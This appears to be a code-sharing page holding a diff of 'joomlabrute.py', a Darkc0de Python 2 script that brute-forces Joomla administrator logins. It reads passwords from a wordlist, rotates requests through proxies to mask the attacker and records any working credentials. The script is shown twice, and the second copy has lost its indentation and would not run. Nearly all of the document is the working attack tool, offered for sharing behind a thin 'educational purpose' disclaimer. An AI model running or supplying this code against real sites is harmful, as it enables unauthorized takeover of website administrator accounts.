iGh0st · June 18, 2014 18:49
diff --git a/joomlabrute.py b/joomlabrute.py
 #!/usr/bin/python
 # Joomla Administrator Login BruteForcer for v1.0 and v1.5

 # Feel free to do whatever you want with this code!
 # Share the c0de!

 # Darkc0de Team 
 # www.darkc0de.com 
 # rsauron[at]gmail[dot]com

 # Greetz to 
 # d3hydr8, P47r1ck, Tarsian, c0mrade, reverenddigitalx
 # and everyone at darkc0de

 # This was written for educational purpose only. Use it at your own risk.
 # Author will be not responsible for any damage!
 # Intended for authorized Web Application Pen Testing!

 # BE WARNED, THIS TOOL IS VERY LOUD..

 import urllib, sys, re, os, socket, httplib, urllib2, time

 #determine platform
 if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin':
 	SysCls = 'clear'
 elif sys.platform == 'win32' or sys.platform == 'dos' or sys.platform[0:5] == 'ms-dos':
 	SysCls = 'cls'
 else:
 	SysCls = 'unknown'

 #say hello
 os.system(SysCls)
 if len(sys.argv) <= 1:
        print "\n|----------------------------------------------|"
        print "| rsauron[@]gmail[dot]com                v1.0  |"
        print "|   7/2008      joomlabrute.py                 |"
        print "|    - Joomla Administrator Panel BruteForcer  |"
        print "| Usage: joomlabrute.py [options]              |"
        print "|                       -h help   darkc0de.com |"
        print "|----------------------------------------------|\n"
        sys.exit(1)

 #define varablies
 site = ""
 dbt = "joomlabrutelog.txt"
 proxy = "None"
 arg_words = ""
 arg_user = "admin"
 arg_verbose = "None"
 count = 0
 gets = 0

 #help option
 for arg in sys.argv:
        if arg == "-h":
                print "\n   Usage: ./joomlabrute.py [options]        rsauron[@]gmail[dot]com darkc0de.com"
                print "\n\tRequired:"
                print "\tDefine: -u       www.site.com/administrator/"
                print "\tDefine: -w       words.txt"
                print "\n\tOptional:"
                print "\tDefine: -user    \"jorge\"                        Default:admin"
                print "\tDefine: -p       \"127.0.0.1:80 or proxy.txt\""
                print "\tDefine: -o       \"ouput_file_name.txt\"          Default:joomlabrutelog.txt"
                print "\tDefine: -v       Verbose Mode"
                print "\n   Ex: ./blindext.py -u \"www.site.com/administrator/\" -w words.txt -v -o site.txt"
                print "   Ex: ./blindext.py -u \"www.site.com/administrator/\" -w words.txt -user jorge -p 127.0.0.1:8080\n"
                sys.exit(1)

 #Check args
 for arg in sys.argv:
 	if arg == "-u":
 		site = sys.argv[count+1]
 	elif arg == "-o":
 		dbt = sys.argv[count+1]
 	elif arg == "-p":
 		proxy = sys.argv[count+1]
 	elif arg == "-w":
 		arg_words = sys.argv[count+1]
 	elif arg == "-user":
 		arg_user = sys.argv[count+1]
 	elif arg == "-v":
 		arg_verbose = sys.argv	
 	count+=1

 #Title write
 file = open(dbt, "a")
 print "\n|----------------------------------------------|"
 print "| rsauron[@]gmail[dot]com                v1.0  |"
 print "|   7/2008      joomlabrute.py                 |"
 print "|    - Joomla Administrator Panel BruteForcer  |"
 print "| Usage: joomlabrute.py [options]              |"
 print "|                       -h help   darkc0de.com |"
 print "|----------------------------------------------|"
 file.write("\n\n|----------------------------------------------|")
 file.write("\n| rsauron[@]gmail[dot]com                v1.0  |")
 file.write("\n|   7/2008      joomlabrute.py                 |")
 file.write("\n|    - Joomla Administrator Panel BruteForcer  |")
 file.write("\n| Usage: joomlabrute.py [options]              |")
 file.write("\n|                       -h help   darkc0de.com |")
 file.write("\n|----------------------------------------------|\n")

 #Arg Error Checking
 if site == "":
        print "[-] Must include -u flag."
        print "[-] For help -h\n"
        sys.exit(1)
 if arg_words == "":
        print "[-] Must include -w flag."
        print "[-] For help -h\n"
        sys.exit(1)
 if proxy != "None":
        if len(proxy.split(".")) == 2:
                proxy = open(proxy, "r").read()
        if proxy.endswith("\n"):
                proxy = proxy.rstrip("\n")
        proxy = proxy.split("\n")
 if site[:7] != "http://": 
 	site = "http://"+site

 #Build proxy list
 socket.setdefaulttimeout(10)
 proxy_list = []
 if proxy != "None":
        
        file.write("[+] Building Proxy List...")
        print "[+] Building Proxy List..."
        for p in proxy:
                try:
                    proxy_handler = urllib2.ProxyHandler({'http': 'http://'+p+'/'})
                    opener = urllib2.build_opener(proxy_handler)
                    opener.open("http://www.google.com")
                    opener.addheaders = [('User-agent', 'Mozilla/5.0')]
                    proxy_list.append(opener)
                    file.write("\n\tProxy:"+p+"- Success")
                    print "\tProxy:",p,"- Success"
                except:
                    file.write("\n\tProxy:"+p+"- Failed")
                    print "\tProxy:",p,"- Failed"
                    pass
        if len(proxy_list) == 0:
                print "[-] All proxies have failed. App Exiting"
                file.write("\n[-] All proxies have failed. App Exiting\n")
                sys.exit(1) 
        print "[+] Proxy List Complete"
        file.write("[+] Proxy List Complete")
 else:
    print "[-] Proxy Not Given"
    file.write("[+] Proxy Not Given")
    proxy_list.append(urllib2.build_opener())
 proxy_num = 0
 proxy_len = len(proxy_list)

 #here we go
 print "[+] BruteForcing:",site
 print "[+] Username:",arg_user
 file.write("\n[+] BruteForcing:"+str(site))
 file.write("\n[+] Username:"+str(arg_user))
 try:
  	words = open(arg_words, "r").readlines()
  	print "[+] Words Loaded:",len(words)
  	words_len = len(words)
  	file.write("\n[+] Words Loaded: "+str(words_len))
 except(IOError): 
  	print "[-] Error: Check your wordlist path\n"
  	sys.exit(1)
 print "[+] [%s]" % time.strftime("%X")
 file.write("\n[+] [%s]" % time.strftime("%X"))
 for word in words:
 	word = word.replace("\r","").replace("\n","")
 	login_form_seq = [
     	('usrname', arg_user),
     	('pass', word),
 	('submit', 'Login')]
 	login_form_data = urllib.urlencode(login_form_seq)
        while 1:
                try:
                        gets+=1
                        proxy_num+=1
                        site_get = proxy_list[proxy_num % proxy_len].open(site, login_form_data).read()
                        break
                except (KeyboardInterrupt, SystemExit):
                        raise
                except:
                        pass
        #See where it says Username... change this to whatever your getting back on a incorrect login
 	if re.search("Username",site_get) == None:
 		print "\n\t[!] Login Successfull:",arg_user+":"+word
 		file.write("\n\n\t[!] Login Successfull: "+str(arg_user)+":"+str(word))
 		break
 	else:
 		if arg_verbose != "None":
 			print "[-] Login Failed:",word
 			file.write("\n[-] Login Failed:"+str(word))

 #Lets wrap it up!
 print "\n[-] [%s]" % time.strftime("%X")
 print "[-] Total URL Requests",gets
 file.write("\n\n[-] [%s]" % time.strftime("%X"))
 file.write("\n[-] Total URL Requests "+str(gets))
 print "[-] Done\n"
 file.write("\n[-] Done\n")
 print "Don't forget to check", dbt,"\n"
 file.close()
	#!/usr/bin/python
	# Joomla Administrator Login BruteForcer for v1.0 and v1.5

	# Feel free to do whatever you want with this code!
	# Share the c0de!

	# Darkc0de Team
	# www.darkc0de.com
	# rsauron[at]gmail[dot]com

	# Greetz to
	# d3hydr8, P47r1ck, Tarsian, c0mrade, reverenddigitalx
	# and everyone at darkc0de

	# This was written for educational purpose only. Use it at your own risk.
	# Author will be not responsible for any damage!
	# Intended for authorized Web Application Pen Testing!

	# BE WARNED, THIS TOOL IS VERY LOUD..

	import urllib, sys, re, os, socket, httplib, urllib2, time

	#determine platform
	if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin':
	SysCls = 'clear'
	elif sys.platform == 'win32' or sys.platform == 'dos' or sys.platform[0:5] == 'ms-dos':
	SysCls = 'cls'
	else:
	SysCls = 'unknown'

	#say hello
	os.system(SysCls)
	if len(sys.argv) <= 1:
	print "\n\|----------------------------------------------\|"
	print "\| rsauron[@]gmail[dot]com v1.0 \|"
	print "\| 7/2008 joomlabrute.py \|"
	print "\| - Joomla Administrator Panel BruteForcer \|"
	print "\| Usage: joomlabrute.py [options] \|"
	print "\| -h help darkc0de.com \|"
	print "\|----------------------------------------------\|\n"
	sys.exit(1)

	#define varablies
	site = ""
	dbt = "joomlabrutelog.txt"
	proxy = "None"
	arg_words = ""
	arg_user = "admin"
	arg_verbose = "None"
	count = 0
	gets = 0

	#help option
	for arg in sys.argv:
	if arg == "-h":
	print "\n Usage: ./joomlabrute.py [options] rsauron[@]gmail[dot]com darkc0de.com"
	print "\n\tRequired:"
	print "\tDefine: -u www.site.com/administrator/"
	print "\tDefine: -w words.txt"
	print "\n\tOptional:"
	print "\tDefine: -user \"jorge\" Default:admin"
	print "\tDefine: -p \"127.0.0.1:80 or proxy.txt\""
	print "\tDefine: -o \"ouput_file_name.txt\" Default:joomlabrutelog.txt"
	print "\tDefine: -v Verbose Mode"
	print "\n Ex: ./blindext.py -u \"www.site.com/administrator/\" -w words.txt -v -o site.txt"
	print " Ex: ./blindext.py -u \"www.site.com/administrator/\" -w words.txt -user jorge -p 127.0.0.1:8080\n"
	sys.exit(1)

	#Check args
	for arg in sys.argv:
	if arg == "-u":
	site = sys.argv[count+1]
	elif arg == "-o":
	dbt = sys.argv[count+1]
	elif arg == "-p":
	proxy = sys.argv[count+1]
	elif arg == "-w":
	arg_words = sys.argv[count+1]
	elif arg == "-user":
	arg_user = sys.argv[count+1]
	elif arg == "-v":
	arg_verbose = sys.argv
	count+=1

	#Title write
	file = open(dbt, "a")
	print "\n\|----------------------------------------------\|"
	print "\| rsauron[@]gmail[dot]com v1.0 \|"
	print "\| 7/2008 joomlabrute.py \|"
	print "\| - Joomla Administrator Panel BruteForcer \|"
	print "\| Usage: joomlabrute.py [options] \|"
	print "\| -h help darkc0de.com \|"
	print "\|----------------------------------------------\|"
	file.write("\n\n\|----------------------------------------------\|")
	file.write("\n\| rsauron[@]gmail[dot]com v1.0 \|")
	file.write("\n\| 7/2008 joomlabrute.py \|")
	file.write("\n\| - Joomla Administrator Panel BruteForcer \|")
	file.write("\n\| Usage: joomlabrute.py [options] \|")
	file.write("\n\| -h help darkc0de.com \|")
	file.write("\n\|----------------------------------------------\|\n")

	#Arg Error Checking
	if site == "":
	print "[-] Must include -u flag."
	print "[-] For help -h\n"
	sys.exit(1)
	if arg_words == "":
	print "[-] Must include -w flag."
	print "[-] For help -h\n"
	sys.exit(1)
	if proxy != "None":
	if len(proxy.split(".")) == 2:
	proxy = open(proxy, "r").read()
	if proxy.endswith("\n"):
	proxy = proxy.rstrip("\n")
	proxy = proxy.split("\n")
	if site[:7] != "http://":
	site = "http://"+site

	#Build proxy list
	socket.setdefaulttimeout(10)
	proxy_list = []
	if proxy != "None":

	file.write("[+] Building Proxy List...")
	print "[+] Building Proxy List..."
	for p in proxy:
	try:
	proxy_handler = urllib2.ProxyHandler({'http': 'http://'+p+'/'})
	opener = urllib2.build_opener(proxy_handler)
	opener.open("http://www.google.com")
	opener.addheaders = [('User-agent', 'Mozilla/5.0')]
	proxy_list.append(opener)
	file.write("\n\tProxy:"+p+"- Success")
	print "\tProxy:",p,"- Success"
	except:
	file.write("\n\tProxy:"+p+"- Failed")
	print "\tProxy:",p,"- Failed"
	pass
	if len(proxy_list) == 0:
	print "[-] All proxies have failed. App Exiting"
	file.write("\n[-] All proxies have failed. App Exiting\n")
	sys.exit(1)
	print "[+] Proxy List Complete"
	file.write("[+] Proxy List Complete")
	else:
	print "[-] Proxy Not Given"
	file.write("[+] Proxy Not Given")
	proxy_list.append(urllib2.build_opener())
	proxy_num = 0
	proxy_len = len(proxy_list)

	#here we go
	print "[+] BruteForcing:",site
	print "[+] Username:",arg_user
	file.write("\n[+] BruteForcing:"+str(site))
	file.write("\n[+] Username:"+str(arg_user))
	try:
	words = open(arg_words, "r").readlines()
	print "[+] Words Loaded:",len(words)
	words_len = len(words)
	file.write("\n[+] Words Loaded: "+str(words_len))
	except(IOError):
	print "[-] Error: Check your wordlist path\n"
	sys.exit(1)
	print "[+] [%s]" % time.strftime("%X")
	file.write("\n[+] [%s]" % time.strftime("%X"))
	for word in words:
	word = word.replace("\r","").replace("\n","")
	login_form_seq = [
	('usrname', arg_user),
	('pass', word),
	('submit', 'Login')]
	login_form_data = urllib.urlencode(login_form_seq)
	while 1:
	try:
	gets+=1
	proxy_num+=1
	site_get = proxy_list[proxy_num % proxy_len].open(site, login_form_data).read()
	break
	except (KeyboardInterrupt, SystemExit):
	raise
	except:
	pass
	#See where it says Username... change this to whatever your getting back on a incorrect login
	if re.search("Username",site_get) == None:
	print "\n\t[!] Login Successfull:",arg_user+":"+word
	file.write("\n\n\t[!] Login Successfull: "+str(arg_user)+":"+str(word))
	break
	else:
	if arg_verbose != "None":
	print "[-] Login Failed:",word
	file.write("\n[-] Login Failed:"+str(word))

	#Lets wrap it up!
	print "\n[-] [%s]" % time.strftime("%X")
	print "[-] Total URL Requests",gets
	file.write("\n\n[-] [%s]" % time.strftime("%X"))
	file.write("\n[-] Total URL Requests "+str(gets))
	print "[-] Done\n"
	file.write("\n[-] Done\n")
	print "Don't forget to check", dbt,"\n"
	file.close()
No results found